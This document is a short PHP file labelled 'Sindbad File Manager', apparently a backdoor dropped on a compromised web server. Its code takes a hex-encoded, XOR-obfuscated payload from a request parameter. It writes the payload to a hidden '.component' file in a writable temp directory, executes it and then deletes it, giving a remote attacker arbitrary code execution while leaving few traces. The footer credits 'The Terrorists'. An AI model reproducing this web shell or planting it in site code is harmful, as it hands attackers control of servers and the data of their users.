Sindbad~EG File Manager
<?php
if(count($_REQUEST) > 0 && isset($_REQUEST["\x6Drk"])){
$entry = hex2bin($_REQUEST["\x6Drk"]);
$data ='' ;for($d=0; $d<strlen($entry); $d++){$data .= chr(ord($entry[$d]) ^ 26);}
$k = array_filter([getcwd(), getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/var/tmp", "/tmp", session_save_path()]);
foreach ($k as $record) {
if (!( !is_dir($record) || !is_writable($record) )) {
$ref = implode("/", [$record, ".component"]);
if (file_put_contents($ref, $data)) {
require $ref;
unlink($ref);
exit;
}
}
}
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists